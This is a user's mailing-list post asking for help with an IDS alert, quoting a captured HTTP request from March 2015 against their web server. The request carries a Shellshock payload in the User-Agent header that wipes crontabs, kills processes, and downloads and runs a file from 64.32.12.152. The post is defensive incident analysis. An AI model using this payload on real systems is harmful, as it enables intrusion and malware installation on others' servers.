Hi Doug,
First gazillion thanks for so awesome work!!!! I am learning a lot from it, now to the point.
I have received an alert from the same rule than Donato, I have pivoted from Snorby to Sguill and reviewed the payload, pcap with wireshark, the Bro transcript, etc..
I am a little concern with the payload, looks like my webserver has been tried to or successfully used for getting something from another host, possibly 64.32.12.152
I have gathered info from both the possible source of this payload and the ip from above
From the capme file this is the part that I do not like at all:
--------------------
Src IP: 31.184.194.114 (Unknown)
Src Port: 54904
Dst Port: 80
OS Fingerprint:
31.184.194.114:54904 - UNKNOWN [S20:56:1:60:M1460,S,T,N,W7:.:?:?] (up: 911 hrs)
"...SRC: GET /cgi-bin/cgi.cgi HTTP/1.1
SRC: Accept: */*
SRC: Accept-Language: en-us
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget
http://64.32.12.152/gnu-bash-max-race ; lwp-download
http://64.32.12.152/gnu-bash-max-race ; fetch
http://64.32.12.152/gnu-bash-max-race ; curl -O
http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*");'
SRC: Host: 151.224.41.41
SRC: Connection: Close
SRC:
SRC:
DST: HTTP/1.1 404 Not Found
DST: Content-Type: text/html; charset=us-ascii
DST: Server: Microsoft-HTTPAPI/2.0
DST: Date: Fri, 06 Mar 2015 17:17:09 GMT
DST: Connection: close
DST: Content-Length: 315
DST:
DST: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""
http://www.w3.org/TR/html4/strict.dtd">
DST: <HTML><HEAD><TITLE>Not Found</TITLE>
DST: <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
DST: <BODY><h2>Not Found</h2>
DST: <hr><p>HTTP Error 404. The requested resource is not found.</p>
DST: </BODY></HTML>"
--------------------
Any thoughts?